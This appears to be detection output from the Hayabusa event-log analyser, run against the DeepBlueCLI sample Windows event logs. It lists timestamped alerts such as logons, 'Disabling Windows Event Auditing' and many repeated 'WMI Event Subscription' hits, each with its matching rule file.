+2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1dc1e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1ee41  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1b293  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1b2fd  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1aae1  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1af2f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:31:43.146 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:33:09.568 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:34:07.677 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:35:01.052 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:36:08.912 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:40:11.872 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:41:14.715 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:42:51.887 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:52:23.564 +09:00,IE10Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
